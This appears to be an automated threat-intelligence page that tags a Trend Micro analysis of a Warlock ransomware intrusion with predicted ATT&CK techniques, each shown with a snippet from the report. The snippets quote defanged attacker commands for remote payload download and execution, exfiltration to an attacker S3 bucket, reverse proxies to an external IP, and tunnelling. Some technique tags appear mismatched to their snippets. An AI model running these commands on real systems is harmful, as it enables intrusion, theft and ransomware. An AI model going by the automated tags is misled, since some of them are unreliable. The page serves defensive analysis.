TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Trend Micro Research

Web Shells, Tunnels, and Ransomware: Dissecting a Warlock Attack

Don Ovid Ladores · 2026-03-16 · Read original ↗

ATT&CK techniques detected

26 predictions
T1059.001PowerShell
99%
"hosted on a supabase storage : c : \ windows \ system32 \ msiexec. exe / q / i hxxps [ : / / ] vdfccjpnedujhrzscjtq [. ] supabase [. ] co / storage / v1 / object / public / image / v4 [. ] msi vs code following installation, velociraptor downloaded vs code using an encoded powers…"
T1055.001Dynamic-link Library Injection
98%
"spawned by velociraptor service : eventsubid : 901 and parentcmd : velociraptorservicerun and processfilepath : powershell. exe hunts encoded powershell execution using reflection assembly load : processcmd : " powershell. exe * unrestricted - encodedcommand " and objectrawdatast…"
T1567.002Exfiltration to Cloud Storage
97%
"command below shows the threat actors exfiltrating data from a targeted file share directly to an attacker - controlled s3 bucket : trendfilesecuritycheck. exe copy \ \ redacted \ redacted : s3 : redacted / src - p - - include " *. { pdf, ai, dwg, dxf, dwt, doc, docx, dwg, dwt, d…"
T1068Exploitation for Privilege Escalation
95%
"( vps ). other reports have noted that multiple high - profile ransomware groups are using this same infrastructure for their secondary - stage operations. defense evasion ( byovd ) in our previous report, the threat actors renamed rclone. exe to trendsecurity. exe to appear legi…"
T1068Exploitation for Privilege Escalation
95%
"run. dll, runcryptor 2 > nul | | exit " following encryption, the ransomware then drops a ransom note named lockdatareadme. txt on affected systems. table 2. summary of ttps used by warlock security recommendations mitigating byovd attacks warlock ’ s reliance on vulnerable drive…"
T1218.011Rundll32
93%
"\ public \ trendsecurity. exe 2 > nul | | exit " this approach ensures malware deployment occurs automatically when systems boot or when group policy refreshes, thereby enabling rapid enterprise - wide infection without requiring individual system access. the primary ransomware p…"
T1572Protocol Tunneling
91%
"##86 ) \ cloudflared \ cloudflared. exe " service install < token > named tunnel execution : " c : \ program files ( x86 ) \ cloudflared \ cloudflared. exe " tunnel run - - token < token > quick tunnel ( ad - hoc reverse proxy to local webserver ) : cloudflared. exe tunnel - - ur…"
T1572Protocol Tunneling
79%
"##ssocks. exe, a. net payload designed for in - memory execution. this step aligned with the observed technique of downloading bytes directly and running them via assembly. load ( ) and entrypoint. invoke ( ) without writing to disk. cloudflare tunnel the commands below show the …"
T1071Application Layer Protocol
75%
". exe ) on the compromised server. the telemetry revealed w3wp. exe spawning a cobalt strike beacon agent that utilized the dll - sideloading technique. the legitimate binary was from the microsoft edge browser named msmpsrv. exe ( original : cookie _ exporter. exe ) that sideloa…"
T1071.001Web Protocols
72%
". exe ) on the compromised server. the telemetry revealed w3wp. exe spawning a cobalt strike beacon agent that utilized the dll - sideloading technique. the legitimate binary was from the microsoft edge browser named msmpsrv. exe ( original : cookie _ exporter. exe ) that sideloa…"
T1572Protocol Tunneling
71%
"##0092b / vscode _ cli _ win32 _ x64 _ cli. zip " - outfile " c : \ programdata \ microsoft \ appv \ code. zip " c : \ windows \ debug \ code - insiders. exe " - - verbose - - cli - data - dir c : \ users \ [ redacted ] \. vscode \ cli tunnel service internal - run - - log - to -…"
T1003.006DCSync
65%
"a tool named debug. exe was used to impersonate a domain controller ( dc ) and retrieve user credentials from another dc via the ms directory replication service remote protocol ( ms ‑ drsr ), constituting a dcsync attack. lateral movement following initial access, the threat act…"
T1003.006DCSync
65%
"c : \ programdata \ vs. bat via cmd. exe. this script was invoked twice within a five - minute window, indicating either a retry mechanism or a two - stage execution sequence. the web shell cproxy. aspx was then written to c : \ programdata \ cproxy. aspx by w3wp. exe, confirming…"
T1068Exploitation for Privilege Escalation
64%
"trendai™ as water manaul ). in our previous article, we detailed how warlock exploited unpatched microsoft sharepoint servers to deploy lockbit - derived ransomware with the. x2anylock extension, using cloudflare tunnels for command and control ( c & c ) and rclone for data exfil…"
T1068Exploitation for Privilege Escalation
59%
"an expanded arsenal while warlock ' s initial access method remains unchanged in this incident ( exploiting vulnerable internet - facing sharepoint servers ), the group has significantly expanded its post - exploitation toolkit. in the previous campaigns, warlock relied on veloci…"
T1218.011Rundll32
56%
"##0092b / vscode _ cli _ win32 _ x64 _ cli. zip " - outfile " c : \ programdata \ microsoft \ appv \ code. zip " c : \ windows \ debug \ code - insiders. exe " - - verbose - - cli - data - dir c : \ users \ [ redacted ] \. vscode \ cli tunnel service internal - run - - log - to -…"
T1090.002External Proxy
55%
"dll, runyuze reverse - c 198 [. ] 13 [. ] 158 [. ] 193 : 443 rundll32 yuze. dll, runyuze reverse - c 198 [. ] 13 [. ] 158 [. ] 193 : 53 ( dns port ) these commands establish a reverse proxy connection to the attacker ' s external c & c server across multiple ports : http ( 80 ), …"
T1219Remote Access Tools
53%
"force - skipnetworkprofilecheck " rdp patcher / wrapper rdp patcher enables the non - server windows edition to have concurrent rdp sessions. multiple sessions are allowed ; thus, administrators are less likely to notice or disconnect an existing session preventing any detections…"
T1105Ingress Tool Transfer
48%
"reflection. assembly ] : : load ( ( new - object net. webclient ). downloaddata ( ' hxxps : / / files [. ] catbox [. ] moe / wzsjlw. dll ' ) ). entrypoint. invoke ( $ null, (, [ string [ ] ] ( \ " 4567 \ " ) ) ) " ] [ " [ net. servicepointmanager ] : : securityprotocol = [ net. s…"
T1021.001Remote Desktop Protocol
47%
"movement. defending against these requires restricting tool execution, segmenting administrative traffic, and implementing granular logging to detect anomalous behavior. critical access controls and monitoring include : - strict application control : implement application allowli…"
T1105Ingress Tool Transfer
42%
"warlock group ' s known use of byovd and security - tool evasion techniques. approximately two weeks later, a second wave of activity was observed on the same compromised sharepoint server. the w3wp. exe process spawned msiexec. exe to silently download and install a remote msi p…"
T1190Exploit Public-Facing Application
42%
"trendai™ as water manaul ). in our previous article, we detailed how warlock exploited unpatched microsoft sharepoint servers to deploy lockbit - derived ransomware with the. x2anylock extension, using cloudflare tunnels for command and control ( c & c ) and rclone for data exfil…"
T1059.001PowerShell
41%
"reflection. assembly ] : : load ( ( new - object net. webclient ). downloaddata ( ' hxxps : / / files [. ] catbox [. ] moe / wzsjlw. dll ' ) ). entrypoint. invoke ( $ null, (, [ string [ ] ] ( \ " 4567 \ " ) ) ) " ] [ " [ net. servicepointmanager ] : : securityprotocol = [ net. s…"
T1190Exploit Public-Facing Application
38%
"an expanded arsenal while warlock ' s initial access method remains unchanged in this incident ( exploiting vulnerable internet - facing sharepoint servers ), the group has significantly expanded its post - exploitation toolkit. in the previous campaigns, warlock relied on veloci…"
T1059.001PowerShell
35%
"spawned by velociraptor service : eventsubid : 901 and parentcmd : velociraptorservicerun and processfilepath : powershell. exe hunts encoded powershell execution using reflection assembly load : processcmd : " powershell. exe * unrestricted - encodedcommand " and objectrawdatast…"
T1652Device Driver Discovery
35%
"run. dll, runcryptor 2 > nul | | exit " following encryption, the ransomware then drops a ransom note named lockdatareadme. txt on affected systems. table 2. summary of ttps used by warlock security recommendations mitigating byovd attacks warlock ’ s reliance on vulnerable drive…"

Summary

Warlock continues to enhance its attack chain with new tactics to improve persistence, lateral movement, and defense evasion using an expanded toolset: TightVNC Yuze, and a persistent BYOVD technique leveraging the NSec driver.